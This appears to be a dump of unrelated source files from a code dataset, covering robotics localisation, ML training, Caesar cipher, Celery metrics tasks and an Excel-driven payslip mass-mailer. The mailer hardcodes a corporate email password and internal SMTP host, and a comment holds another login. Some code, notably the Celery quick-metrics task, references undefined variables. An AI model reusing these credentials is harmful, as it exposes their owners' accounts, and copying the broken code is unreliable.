\\\n prev_pose.rotation.angle_z.degrees\n curr_x, curr_y, curr_h = curr_pose.position.x, curr_pose.position.y, \\\n curr_pose.rotation.angle_z.degrees\n \n dx, dy = rotate_point(curr_x-last_x, curr_y-last_y, -last_h)\n if cvt_inch:\n dx, dy = dx / grid.scale, dy / grid.scale\n\n return (dx, dy, diff_heading_deg(curr_h, last_h))\n\n\nasync def marker_processing(robot, camera_settings, show_diagnostic_image=False):\n '''\n Obtain the visible markers from the current frame from Cozmo's camera. \n Since this is an async function, it must be called using await, for example:\n\n markers, camera_image = await marker_processing(robot, camera_settings, show_diagnostic_image=False)\n\n Input:\n - robot: cozmo.robot.Robot object\n - camera_settings: 3x3 matrix representing the camera calibration settings\n - show_diagnostic_image: if True, shows what the marker detector sees after processing\n Returns:\n - a list of detected markers, each being a 3-tuple (rx, ry, rh) \n (as expected by the particle filter's measurement update)\n - a PIL Image of what Cozmo's camera sees with marker annotations\n '''\n\n global grid\n\n # Wait for the latest image from Cozmo\n image_event = await robot.world.wait_for(cozmo.camera.EvtNewRawCameraImage, timeout=30)\n\n # Convert the image to grayscale\n image = np.array(image_event.image)\n image = color.rgb2gray(image)\n \n # Detect the markers\n markers, diag = detect.detect_markers(image, camera_settings, include_diagnostics=True)\n\n # Measured marker list for the particle filter, scaled by the grid scale\n marker_list = [marker['xyh'] for marker in markers]\n marker_list = [(x/grid.scale, y/grid.scale, h) for x,y,h in marker_list]\n\n # Annotate the camera image with the markers\n if not show_diagnostic_image:\n annotated_image = image_event.image.resize((image.shape[1] * 2, image.shape[0] * 2))\n annotator.annotate_markers(annotated_image, markers, scale=2)\n else:\n diag_image = color.gray2rgb(diag['filtered_image'])\n diag_image = Image.fromarray(np.uint8(diag_image * 255)).resize((image.shape[1] * 2, image.shape[0] * 2))\n annotator.annotate_markers(diag_image, markers, scale=2)\n annotated_image = diag_image\n\n return marker_list, annotated_image\n\n\nasync def run(robot: cozmo.robot.Robot):\n global picked_up_flag, prev_pose\n global grid, gui, pf\n\n # start streaming\n robot.camera.image_stream_enabled = True\n robot.camera.color_image_enabled = False\n robot.camera.enable_auto_exposure()\n await robot.set_head_angle(cozmo.util.degrees(0)).wait_for_completed()\n await robot.set_lift_height(0).wait_for_completed()\n\n # 
Obtain the camera intrinsics matrix\n fx, fy = robot.camera.config.focal_length.x_y\n cx, cy = robot.camera.config.center.x_y\n camera_settings = np.array([\n [fx, 0, cx],\n [ 0, fy, cy],\n [ 0, 0, 1]\n ], dtype=np.float)\n \n ###################\n\n # YOUR CODE HERE\n start_time = time.time()\n has_converged = False\n converged_score = 0\n arrived_to_goal = False\n\n while True:\n\n if arrived_to_goal and not robot.is_picked_up:\n await robot.drive_wheels(0.0, 0, 0)\n\n #kidnapped\n if robot.is_picked_up:\n picked_up_flag = False\n arrived_to_goal = False\n has_converged = False\n converged_score = 0\n await robot.drive_wheels(0.0, 0, 0)\n await robot.play_anim_trigger(cozmo.anim.Triggers.CodeLabDejected).wait_for_completed()\n\n while robot.is_picked_up:\n await robot.drive_wheels(0.0, 0, 0)\n\n prev_pose = cozmo.util.Pose(0, 0, 0, angle_z=cozmo.util.Angle(degrees=0))\n pf.particles = Particle.create_random(PARTICLE_COUNT, grid)\n\n continue\n\n\n #INFORMATION UPDATE\n curr_pose = robot.pose\n odom = compute_odometry(curr_pose, cvt_inch=True)\n prev_pose = robot.pose\n marker_list, annotated_image = await marker_processing(robot, camera_settings, show_diagnostic_image=False)\n\n #PF\n (mean_x, mean_y, mean_h, mean_confidence) = pf.update(odom, marker_list)\n\n gui.show_particles(pf.particles)\n gui.show_mean(mean_x, mean_y, mean_h)\n gui.show_camera_image(annotated_image)\n gui.updated.set()\n\n #pf returns convergence\n if mean_confidence:\n converged_score += 2.5\n\n # converged and confident of it\n if converged_score >= 25:\n has_converged = True\n\n #if pf converged but then diverged again\n if has_converged and not mean_confidence:\n converged_score -= 1.5\n\n # if the pf diverges a lot, then reset\n if converged_score < 0:\n has_converged = False\n converged_score = 0\n\n temp_score = 1 + converged_score / 10\n await robot.drive_wheels(15.0 / temp_score, -15.0 / temp_score)\n\n if has_converged:\n await robot.drive_wheels(0.0, 0, 0)\n goal_x = goal[0]\n goal_y = goal[1]\n goal_h = goal[2]\n\n d_x = goal_x - mean_x\n d_y = goal_y - mean_y\n\n target = atan2(d_y, d_x) * 180.0 / 3.14159\n\n initial_degree = diff_heading_deg(target, mean_h)\n zero_degree = diff_heading_deg(goal_h, target)\n distance = grid_distance(mean_x, mean_y, goal_x, goal_y)\n\n # turn to the right angle\n await robot.turn_in_place(degrees(int(initial_degree * 0.95))).wait_for_completed()\n # drive to the goal\n await robot.drive_straight(distance_mm(distance * grid.scale * 0.95), speed_mmps(50)).wait_for_completed()\n # turn to zero degrees\n await robot.turn_in_place(degrees(int(zero_degree * 0.975))).wait_for_completed()\n # be happy!\n await robot.play_anim_trigger(cozmo.anim.Triggers.CodeLabHappy).wait_for_completed()\n\n arrived_to_goal = True\n else:\n # if there is no convergence, keep turning in place\n if ((time.time() - start_time) // 1) % 8 < 3 or len(marker_list) <= 0:\n await robot.drive_wheels(12.0, -12, 0)\n elif len(marker_list) > 0:\n markers_loc = marker_list[0][0]\n if markers_loc > 12:\n await robot.drive_wheels(35.0, 35, 0)\n if markers_loc < 8:\n await robot.drive_wheels(-35.0, -35, 0)\n else:\n await robot.drive_wheels(0.0, 0, 0)\n\n ###################\n\nclass CozmoThread(threading.Thread):\n \n def __init__(self):\n threading.Thread.__init__(self, daemon=False)\n\n def run(self):\n cozmo.robot.Robot.drive_off_charger_on_connect = False # Cozmo can stay on his charger\n cozmo.run_program(run, use_viewer=False)\n\n\nif __name__ == '__main__':\n\n # cozmo thread\n cozmo_thread = 
CozmoThread()\n cozmo_thread.start()\n\n # init\n gui.show_particles(pf.particles)\n gui.show_mean(0, 0, 0)\n gui.start()\n\n","sub_path":"Lab 4/Lab4_Release/go_to_goal_cozmo.py","file_name":"go_to_goal_cozmo.py","file_ext":"py","file_size_in_byte":9382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"88608456","text":"from tkinter import *\nimport smtplib\nimport email.mime.multipart \nfrom email.mime.text import MIMEText\nimport xlrd\nimport win32ui\ndef sendmail():\n\t\n\t#登陆邮箱 \n\thead=t4.get()\n\tsubject=t5.get()\n\tfmail='changnl@chinaunicom.cn'\n\tpsd='CNLcw198608'\n\tsmtp=smtplib \n\tsmtp=smtplib.SMTP() \n\tsmtp.connect('10.11.158.13','25')\n\tsmtp.starttls() \n\t#smtp.login('lixf311@chinaunicom.cn','2676518aA')\n\tsmtp.login(fmail,psd)\n\t\n\t#print (head)\n\t#print (subject)\n\t#读取表格sheet1\n\t#path=input('输入邮件明细地址')\n\t#book=xlrd.open_workbook(r\"d:\\201601.xlsx\")\n\tbook=xlrd.open_workbook(path)\n\tsh = book.sheet_by_index(0)\n\tcx=sh.ncols-1\n\t#编辑邮件\n\t#msg=email.mime.multipart.MIMEMultipart()\n\t#head=input('输入邮件头部内容')\n\t#subject=input('输入邮件的主题') \n\tL= range(sh.nrows)\n\tfor rx in L[1:]:\n\t\tmail=sh.cell_value(rx,cx)\n\t\thtml='
<html><body>'+head+'<table border=\"1\"><tr>'\n\t\tfor cl in range(sh.ncols-1):\n\t\t\thtml=html+'<th>'+str(sh.cell_value(0,cl))+'</th>'\n\t\thtml=html+'</tr><tr>'\n\t\tfor dl in range(sh.ncols-1):\n\t\t\tif type(sh.cell_value(rx,dl))==float :\n\t\t\t\thtml=html+'<td>'+str(round(sh.cell_value(rx,dl),2))+'</td>'\n\t\t\telse :\n\t\t\t\thtml=html+'<td>'+str(sh.cell_value(rx,dl))+'</td>'\n\t\thtml=html+'</tr></table></body></html>
'\n\t\tmsg = MIMEText(html,'html','utf-8') \n\t\tmsg['from']=fmail\n\t\tmsg['to']=mail \n\t\t#msg['subject']='测试工资条'\n\t\tmsg['subject']=subject\n\t\tsmtp.sendmail(fmail,mail,msg.as_string())\n\t\tprint (mail,'邮件发送成功') \n\t\t#print (html) \n\tsmtp.quit() \ndef openfile():\n\tdlg = win32ui.CreateFileDialog(1) # 1表示打开文件对话框\n\tdlg.SetOFNInitialDir('C:/') # 设置打开文件对话框中的初始显示目录\n\tdlg.DoModal()\n\tfilename = dlg.GetPathName() # 获取选择的文件名称\n\treturn filename\nroot=Tk()\n\nLabel(root,text='输入发送邮箱',width=50).pack()\n\nt1=StringVar()\ne1 = Entry(root,textvariable = t1,width=45)\ne1.pack()\n\nLabel(root,text='输入邮箱密码',width=50).pack()\n\nt2=StringVar()\ne2 = Entry(root,textvariable = t2,width=45,show='*')\ne2.pack()\n\nLabel(root,text='execl文件',width=50).pack()\n\n#Button(root,text='打开文件',command=openfile,width=10,height=2).pack()\n#t3=StringVar()\nt3=openfile()\ne3 = Label(root,text =t3,width=45)\n#t3=openfile()\ne3.pack()\npath=t3\n\nLabel(root,text='输入邮件头部文字内容',width=50).pack()\n\nt4=StringVar()\ne4 = Entry(root,textvariable = t4,width=45)\n#t4.set('输入邮件头部文字内容')\ne4.pack()\nhead=t4.get()\n\nLabel(root,text='输入邮件的主题',width=50).pack()\nt5=StringVar()\ne5 = Entry(root,textvariable = t5,width=45)\n#t5.set('输入邮件的主题')\ne5.pack()\nsubject=t5.get()\n\nButton(root,text='发送邮件',command=sendmail,width=10,height=2).pack()\n\nmainloop()","sub_path":"python/2cs.py","file_name":"2cs.py","file_ext":"py","file_size_in_byte":2698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"109325123","text":"# -*- coding: utf-8 -*-\nimport logging\n\nimport coloredlogs\n\nfrom Coach import Coach\nfrom graph.graphGame import graphGame as Game\nfrom graph.pytorch.NNet import NNetWrapper as nn\nfrom utils import *\n\nlog = logging.getLogger(__name__)\n\ncoloredlogs.install(level='INFO') # Change this to DEBUG to see more info.\n\nargs = dotdict({\n 'numIters': 1000,\n 'numEps': 50, # Number of complete self-play games to simulate during a new iteration.\n 'maxlenOfEps': 40, # Max number of steps in an episode\n 'removal':10, # Blocker's removal limit\n 'remCost':0, # Cost of removing one edge\n 'tempThreshold': 15, #\n 'updateThreshold': 0.5, # During arena playoff, new neural net will be accepted if threshold or more of games are won.\n 'maxlenOfQueue': 200000, # Number of game examples to train the neural networks.\n 'numMCTSSims': 25, # Number of games moves for MCTS to simulate.\n 'arenaCompare': 40, # Number of games to play during arena play to determine if new net will be accepted.\n 'cpuct': 1,\n\n 'checkpoint': './temp0716/',\n 'load_model': False,\n 'load_folder_file': ('/dev/models/8x100x50','best.pth.tar'),\n 'numItersForTrainExamplesHistory': 20,\n\n})\n\n\ndef main():\n log.info('Loading %s...', Game.__name__)\n goal_position = [9,9]\n g = Game(10,10,goal_position)\n\n log.info('Loading %s...', nn.__name__)\n rnnet = nn(g,1) # Neural network for the runner\n bnnet = nn(g,-1) # Neural network for the blocker\n\n if args.load_model:\n log.info('Loading checkpoint \"%s/%s\"...', args.load_folder_file)\n nnet.load_checkpoint(args.load_folder_file[0], args.load_folder_file[1])\n else:\n log.warning('Not loading a checkpoint!')\n\n log.info('Loading the Coach...')\n c = Coach(g, rnnet, bnnet, args)\n\n if args.load_model:\n log.info(\"Loading 'trainExamples' from file...\")\n c.loadTrainExamples()\n\n log.info('Starting the learning process 🎉')\n c.learn()\n\n\nif __name__ == \"__main__\":\n 
main()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2097,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"238701780","text":"from unittest import TestCase\nfrom mock import Mock, patch\nfrom hackernews_api import HackerNewsAPI\nfrom requests import get\n\nclass TestHackerNewsAPI(TestCase):\n def test_get_top_stories(self):\n hackernews = HackerNewsAPI(0)\n self.assertEqual(len(hackernews.get_top_stories()), 0)\n\n hackernews = HackerNewsAPI(5)\n self.assertLessEqual(len(hackernews.get_top_stories()), 5)\n\n hackernews = HackerNewsAPI(550)\n self.assertLessEqual(len(hackernews.get_top_stories()), 500)\n\n def test_get_item(self):\n with patch('hackernews_api.get') as fake_get:\n hackernews = HackerNewsAPI(0)\n \n fake_get.return_value.status_code = 200\n result = hackernews.get_item(0) \n self.assertIsNotNone(result)\n\n fake_get.return_value.status_code = 404\n result = hackernews.get_item(0) \n self.assertIsNone(result)","sub_path":"tests/test_hackernews_api.py","file_name":"test_hackernews_api.py","file_ext":"py","file_size_in_byte":948,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"400471683","text":"# Let's say you have a CSV datafile:\n\ndataFile = \"\"\"\n\"entry1\",2,3.6\n\"boots\",5,1.7\n\"slack\",1,2.6\n\"triffid\",11,-1.5\n\"\"\"\n\n# The data needs to be sorted numerically by the second column.\n# How would you go about sorting the entries and dumping the\n# newly sorted data?\n\ndef process(dataFile):\n dataSet = dataFile.splitlines()\n dataSet.remove('')\n output = []\n for data in dataSet:\n output.append(data.split(\",\")) # [\"entry1\",2,3.6]\n output.sort(key=lambda x:int(x[1]))\n result = \" \".join(str(data) for data in output)\n\n print (result)\n\n\nprocess(dataFile)\n","sub_path":"Interview/Apple/sortData.py","file_name":"sortData.py","file_ext":"py","file_size_in_byte":580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"352319560","text":"def codage(mot: str, decalage: int) -> str:\n \"\"\"\n Permet de chiffrer une chaîne de caractères mot avec le code de césar en utilisant un décalage défini\n :param mot: str\n :param decalage: int\n :return: str\n \"\"\"\n result = \"\"\n for c in mot:\n result += convertir(c, decalage)\n return result\n\n\ndef convertir(lettre: str, decalage: int) -> str:\n \"\"\"\n Convertis un caractère avec le code de césar\n :param lettre: str[1]\n :param decalage: int\n :return: Le caractère déplacé de decalage éléments dans la table ASCII\n \"\"\"\n c = ord(lettre)\n if 96 < c < 123:\n if c + decalage > 122:\n decalage = 97 + (c + decalage - 122) - 123\n elif 64 < c < 91:\n if c + decalage > 90:\n decalage = 65 + (c + decalage - 90) - 91\n else:\n decalage = 0\n\n return chr(c + decalage)\n\n\nprint(codage('Vive la NSI !', 4))\n","sub_path":"confinement/novembre/20/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"576961169","text":"import tensorflow as tf\nimport numpy as np\nfrom tensorflow.contrib.layers import xavier_initializer_conv2d\nfrom tensorflow.contrib.layers import xavier_initializer\n\n\n\ndef Network_LSTM(input, keep_prob, output_dim, scope_name = \"LSTM\", n_hidden=128, n_features=128, is_training=False):\n with tf.variable_scope(scope_name, reuse=tf.AUTO_REUSE) as scope:\n cells = 
[tf.nn.rnn_cell.BasicRNNCell(n_hidden) for layer in range(3)]\n cells_drop = [tf.nn.rnn_cell.DropoutWrapper( cell, input_keep_prob=keep_prob,state_keep_prob=keep_prob) for cell in cells]\n #cell2 = tf.nn.rnn_cell.BasicLSTMCell(n_hidden,name=\"cell2\")\n #cell3 = tf.nn.rnn_cell.BasicLSTMCell(n_hidden,name=\"cell3\")\n\n multi_cell = tf.nn.rnn_cell.MultiRNNCell(cells_drop)\n outputs,states = tf.nn.dynamic_rnn(multi_cell,input,dtype=tf.float32)\n outputs_features = tf.transpose(outputs,[1,0,2])\n outputs_features = outputs_features[-1]\n\n outputs_features = tf.layers.dense(outputs_features,units=n_features,activation = tf.nn.relu)\n logits = tf.layers.dense(outputs_features,units=output_dim,activation = None)\n outputs = tf.layers.dense(outputs_features,units=output_dim,activation = None)\n return outputs, logits\n\n\nif __name__ == \"__main__\":\n duration, input_dim, output_dim = 50,1,1\n input = tf.placeholder(tf.float32, shape=[None, duration, input_dim]) # None,step,input\n Network_LSTM(input,output_dim)","sub_path":"Police/Police/modules/network_lstm.py","file_name":"network_lstm.py","file_ext":"py","file_size_in_byte":1452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"401441565","text":"from const import * #使用常量\nfrom board import * # 导入棋盘类\nimport copy\n\n# 人工智能算法类\nclass Algorithm:\n # 构造器 传入棋盘对象 构件一个实际棋盘和一个虚拟棋盘\n def __init__(self, board):\n self.board = board\n\n # 根据食物位置 蛇头位置 蛇身的状态决定移动的方向\n def findDirection(self):\n return \"down\"\n\n # 在各种方案都不行时,随便找一个可行的方向来走(1步),\n def any_possible_move(self):\n best_move = \"none\"\n self.board.board_reset()\n self.board.board_refresh()\n\n min = const.UNDEFINED\n dir = [\"left\", \"up\", \"right\", \"down\"]\n for i in range(4):\n # 判断这个点是否能往这个方向移动(去寻找食物)\n if self.board.is_move_possible(self.board.head, dir[i]):\n # 如果可以移动 则直接使用该方向了\n best_move = dir[i]\n break\n \n return best_move\n\n # 根据食物位置 蛇头位置 蛇身的状态决定移动的方向\n def findDirection(self):\n best_move = self.choose_shortest_safe_move()\n if best_move == \"none\":\n \tbest_move = self.any_possible_move()\n \n #return \"down\"\n return best_move # 真的来了啊\n\n \n # 从蛇头开始,根据board中元素值,\n # 从蛇头周围4个领域点中选择最短路径\n # 确保移动后蛇头与食物的欧氏距离比移动前的要小即可\n # 返回值为\"left\" \"right\" \"up\" \"down\" \"none\"之一\n def choose_shortest_safe_move(self, board = None):\n # 创建虚拟的棋盘 该棋盘可能来源于真实的棋盘 也可能来源于虚拟生成的棋盘\n if board:\n tmpboard = copy.deepcopy(board)\n else:\n tmpboard = copy.deepcopy(self.board)\n \n best_move = \"none\"\n dir = [\"left\", \"up\", \"right\", \"down\"]\n for i in range(4):\n # 判断这个点是否能往这个方向移动(去寻找食物)\n if tmpboard.is_move_possible(tmpboard.head, dir[i]):\n # 移动后的点\n next = tmpboard.move(tmpboard.head, dir[i])\n # 判断移动后的点与食物的距离是否比移动前的点与食物的距离要小\n if manhattan_distance(next, tmpboard.food) < manhattan_distance(tmpboard.head, tmpboard.food):\n # 判断两个点之间是否有障碍(蛇尾)无法直接通过曼哈顿距离到达\n if not tmpboard.is_obstacle_between(next, tmpboard.food):\n best_move = dir[i]\n break\n \n return best_move\n \n\n\n\n\n","sub_path":"HungrySneak/algorithm.py","file_name":"algorithm.py","file_ext":"py","file_size_in_byte":2718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"111326452","text":"import sys\nimport urllib2\nfrom bs4 import BeautifulSoup\n\ndef parselMG(content):\n imgset=set()\n soup = BeautifulSoup(content)\n for url in soup.findAll('img'):\n x = url.get('src','')\n imgset.add(x)\n return imgset\n\ndef write_outputs(urls, filename):\n with open(filename, 'w') as f:\n for url in urls:\n f.write(url)\n 
f.write('\\n')\n\ndef main():\n url = 'http://www.baidu.com'\n #url = 'http://www.sjtu.edu.cn'\n if len(sys.argv) > 1:\n url = sys.argv[1]\n content = urllib2.urlopen(url).read()\n urls_2=parselMG(content)\n\n write_outputs(urls_2, 'res2.txt')\n\nif __name__ == '__main__':\n main()","sub_path":"1/work_2.py","file_name":"work_2.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"400266969","text":"\"\"\" Utilities for detecting outliers\r\n\r\nThese functions take a vector of values, and return a boolean vector of the\r\nsame length as the input, where True indicates the corresponding value is an\r\noutlier.\r\n\"\"\"\r\n\r\n# Python 2 compatibility\r\nfrom __future__ import print_function, division\r\n\r\n# Any imports you need\r\n# LAB(begin solution)\r\nimport numpy as np\r\n# LAB(replace solution)\r\n# +++your code here+++\r\n# LAB(end solution)\r\n\r\n\r\ndef iqr_detector(measures, iqr_proportion=1.5):\r\n \"\"\" Detect outliers in `measures` using interquartile range.\r\n\r\n Returns a boolean vector of same length as `measures`, where True means the\r\n corresponding value in `measures` is an outlier.\r\n\r\n Call Q1, Q2 and Q3 the 25th, 50th and 75th percentiles of `measures`.\r\n\r\n The interquartile range (IQR) is Q3 - Q1.\r\n\r\n An outlier is any value in `measures` that is either:\r\n\r\n * > Q3 + IQR * `iqr_proportion` or\r\n * < Q1 - IQR * `iqr_proportion`.\r\n\r\n See: https://en.wikipedia.org/wiki/Interquartile_range\r\n\r\n Parameters\r\n ----------\r\n measures : 1D array\r\n Values for which we will detect outliers\r\n iqr_proportion : float, optional\r\n Scalar to multiply the IQR to form upper and lower threshold (see\r\n above). Default is 1.5.\r\n\r\n Returns\r\n -------\r\n outlier_tf : 1D boolean array\r\n A boolean vector of same length as `measures`, where True means the\r\n corresponding value in `measures` is an outlier.\r\n \"\"\"\r\n # Any imports you need\r\n # LAB(begin solution)\r\n q1, q3 = np.percentile(measures, [25, 75])\r\n iqr = q3 - q1\r\n up_thresh = q3 + iqr * iqr_proportion\r\n down_thresh = q1 - iqr * iqr_proportion\r\n return np.logical_or(measures > up_thresh, measures < down_thresh)\r\n # LAB(replace solution)\r\n # Hints:\r\n # * investigate np.percentile\r\n # * You'll likely need np.logical_or\r\n # +++your code here+++\r\n # LAB(end solution)\r\n","sub_path":"solutions/detectors.py","file_name":"detectors.py","file_ext":"py","file_size_in_byte":1929,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"17894812","text":"import frappe\n\ndef validate(doc,method):\n\ttotal=0\n\tfor d in doc.get('taxes'):\n\t\ttotal+=round(d.tax_amount)\n\t\td.tax_amount=round(d.tax_amount)\n\ndef on_create_gl_entry(doc,method):\n\tif doc.get('voucher_type')==\"Purchase Invoice\" :\n\t\tsi=frappe.get_doc('Purchase Invoice',doc.get('voucher_no'))\n\t\tfor d in si.get('taxes'):\n\t\t\tif d.account_head==doc.account:\n\t\t\t\tfrappe.db.set_value(doc.doctype,doc.name,'credit',d.tax_amount)\n\t\t\t\tfrappe.db.set_value(doc.doctype,doc.name,'credit_in_account_currency',d.tax_amount)","sub_path":"homzhub_customization/homzhub_customization/doctype/purchase_invoice.py","file_name":"purchase_invoice.py","file_ext":"py","file_size_in_byte":509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"435515222","text":"\"\"\"\nCombined Structural variation callset from both 
DELLY and MANTA\n\n\"\"\"\n\nimport argparse\nimport re\nimport os\nimport subprocess\nimport shlex\n\n\ndef argument_parser():\n \"\"\"parses argument passed on from command line\"\"\"\n parser = argparse.ArgumentParser(\n description='Writes a configuration file for Circos Plot from .circosData inputs')\n\n\n parser.add_argument('--cnv', required=True, help='CNV circosData')\n parser.add_argument('--sv', required=True, help='SV circosData')\n parser.add_argument('--sampleName', required=True, help='Sample name prefix for output configuration file')\n parser.add_argument('-o', '--outputDIR', required=False, default=os.getcwd())\n parser.add_argument('-t', '--template', required=True, help='Template configuration file')\n parser.add_argument('--vaf', required=True, help='SNV Vaf circosData')\n parser.add_argument('--rainfall', required=True, help='SNV Rainfall circosData')\n\n args = vars(parser.parse_args())\n\n outputDIR = args['outputDIR']\n sampleName = args['sampleName']\n sv = args['sv']\n cnv = args['cnv']\n template = args['template']\n rainfall = args['rainfall']\n vaf = args['vaf']\n return sv, cnv, outputDIR, sampleName, template, rainfall, vaf\n\n\ndef create_configuration(template, sv, cnv, snv_vaf, snv_rainfall, circosConfig, circosPlot):\n \"\"\"read in template file, \n substitue , , , , to respective file names\"\"\"\n with open(template, 'r') as f:\n with open(circosConfig, 'w') as g:\n for line in f:\n if re.search(string=line, pattern=r'') != None:\n replaced_line = re.sub(string=line, pattern=r'', repl=circosPlot)\n elif re.search(string=line, pattern=r'') != None:\n replaced_line = re.sub(string=line, pattern=r'', repl=sv)\n elif re.search(string=line, pattern=r'') != None:\n replaced_line = re.sub(string=line, pattern=r'', repl=cnv)\n elif re.search(string=line, pattern=r'', repl=snv_vaf)\n elif re.search(string=line, pattern=r'', repl=snv_rainfall)\n else:\n replaced_line = line \n \n g.write(replaced_line)\n\n\n\ndef main():\n sv, cnv, outputDIR, sampleName, template, rainfall, vaf = argument_parser()\n\n circosConfig= os.path.join(outputDIR, sampleName + '.conf')\n circosPlot = os.path.join(outputDIR, sampleName + '.circosPlot.png')\n create_configuration(template, sv, cnv, vaf, rainfall, circosConfig, circosPlot)\n print(f'Output Circos Configuration file is written: {circosConfig}')\n return 0\n\nif __name__=='__main__':\n main()\n\n","sub_path":"circosConfigPrep.py","file_name":"circosConfigPrep.py","file_ext":"py","file_size_in_byte":3036,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"290400564","text":"\"\"\"\nThis tutorial aims at demonstrating the impressive loading speed that allowed by trainer,\neven on its (possibly) complex data structure!\n\"\"\"\n\nfrom sqlalchemy.orm import joinedload, subqueryload\nfrom tqdm import tqdm\n\nimport trainer.lib as lib\nimport trainer.lib.demo_data as demo_data\nimport trainer.ml as ml\nfrom trainer.ml.torch_utils import bench_mark_dataset\n\n\ndef benchmark_mnist():\n ds = sess.query(lib.Dataset).filter(lib.Dataset.name == 'mnist').first()\n if ds is None:\n ds = sd.build_mnist(sd)\n\n split_old = sess.query(lib.Split).options(subqueryload(lib.Split.sbjts)).first()\n split = sess.query(lib.Split).options(\n joinedload(lib.Split.sbjts).joinedload(lib.Subject.ims, innerjoin=True)\n ).filter(lib.Split.name == \"train\").first()\n print(split.name)\n\n mnist_res = bench_mark_dataset(sd.mnist_train, lambda t: (t[0].size, t[1]))\n trainer_res = 
bench_mark_dataset(split, lambda s: (s.ims[0].values().shape, s.ims[0].get_class('digit')))\n\n\nif __name__ == '__main__':\n # lib.reset_database()\n sess = lib.Session()\n sd = demo_data.SourceData('D:\\\\')\n\n ds = sd.build_arc(sess)\n\n split = ds.get_split_by_name('training')\n aux = []\n for s in tqdm(split):\n aux.append(s.ims[0].values())\n\n aux = []\n for s, gt in tqdm(ml.InMemoryDataset('arc', 'training', lambda x, y: (x, y), mode=ml.ModelMode.Train)):\n aux.append(s.ims[0].values())\n","sub_path":"tutorials/loading_benchmark.py","file_name":"loading_benchmark.py","file_ext":"py","file_size_in_byte":1421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"320719587","text":"from __future__ import absolute_import\n\nfrom datetime import datetime\nfrom celery import task\nfrom django.core.exceptions import ObjectDoesNotExist\n\nfrom .models import BlockMetricData, BlockMetricDataRaw\n\nto_compute_fast = set()\nto_compute_slow = set()\n\n@task\ndef write_raw_block_metric(story_id, block_id, user_id, seconds):\n global to_compute_fast\n global to_compute_slow\n\n # TODO: Consider batching into chunks of 100 writes at a time\n new_data = BlockMetricDataRaw.objects.create(\n story_id=story_id,\n block_id=block_id,\n user_id=user_id,\n seconds=seconds\n )\n new_data.save()\n\n to_compute_slow.add(story_id)\n to_compute_fast.add(story_id)\n return\n\n\n@task\ndef compute_story_blocks(quick):\n global to_compute_slow\n global to_compute_fast\n story_ids = None\n\n if quick:\n story_ids = set(to_compute_fast)\n to_compute_fast = set()\n for story_id in story_ids:\n compute_story_block_metrics_quick.delay(story_id)\n else:\n story_ids = set(to_compute_slow)\n to_compute_slow = set()\n for story_id in story_ids:\n compute_story_block_metrics.delay(story_id)\n return\n\n\n@task\ndef compute_story_block_metrics(story_id):\n \"\"\"\n Get all blocks on a story and compute accurate metrics\n Run sporadically\n \"\"\"\n raw_block_metrics = BlockMetricDataRaw.objects.filter(story_id=story_id)\n block_ids = set([data.block_id for data in raw_block_metrics])\n\n for block_id in block_ids:\n all_block_metrics = BlockMetricDataRaw.objects.filter(story_id=story_id, block_id=block_id)\n total_time = sum([data.seconds for data in all_block_metrics])\n unique_users = set([data.user_id for data in all_block_metrics])\n average_time = float(total_time) / len(unique_users)\n\n try:\n existing_metric = BlockMetricData.objects.get(story_id=story_id, block_id=block_id)\n existing_metric.average_time = average_time\n existing_metric.total_time = total_time\n existing_metric.unique_views = len(unique_users)\n\n # Total_views needs to be figure out still\n existing_metric.total_views = len(unique_users)\n existing_metric.updated = datetime.now()\n existing_metric.save()\n\n except ObjectDoesNotExist:\n new_metric = BlockMetricData.objects.create(\n story_id = story_id,\n block_id = block_id,\n average_time = average_time,\n total_time = total_time,\n unique_views = len(unique_users)\n )\n new_metric.save()\n return\n\n\n@task\ndef compute_story_block_metrics_quick(story_id):\n \"\"\"\n Get only the new blocks, some metrics like unique users and average time might be innacurate\n Run frequently\n \"\"\"\n raw_block_metrics = BlockMetricDataRaw.objects.filter(story_id=story_id)\n block_ids = set([data.block_id for data in raw_block_metrics])\n\n for block_id in block_ids:\n updated_time = datetime.now()\n try:\n 
metric=BlockMetricData.objects.get(story_id=story_id, block_id=block_id)\n total_time_old = metric.get('total_time', 0)\n average_time_old = metric.get('average_time', 0.0)\n unique_users_old = metric.get('unique_users', 0)\n\n except ObjectDoesNotExist:\n metric=None\n total_time_old = 0\n average_time_old = 0.0\n unique_users_old = 0\n\n if metric:\n last_update = metric.updated\n block_metrics = BlockMetricDataRaw.objects.filter(story_id=story_id, block_id=block_id, timestamp__gte=last_update)\n else:\n block_metrics = BlockMetricDataRaw.objects.filter(story_id=story_id, block_id=block_id)\n\n total_time_new = sum([data.seconds for data in all_block_metrics])\n total_time = total_time_new + total_time_old\n\n unique_users_new = len(set([data.user_id for data in all_block_metrics]))\n unique_users = unique_users_new + unique_users_old\n\n percent_new = float(unique_users_new) / unique_users\n average_time_new = float(total_time_new) / unique_users_new\n average_time = (average_time_new * percent_new) + (average_time_old * (1.0-percent_new))\n\n if metric:\n metric.average_time = average_time\n metric.total_time = total_time\n metric.unique_views = unique_users\n metric.updated = update_time\n else:\n metric = BlockMetricData.objects.create(\n story_id = story_id,\n block_id = block_id,\n average_time = average_time,\n total_time = total_time,\n 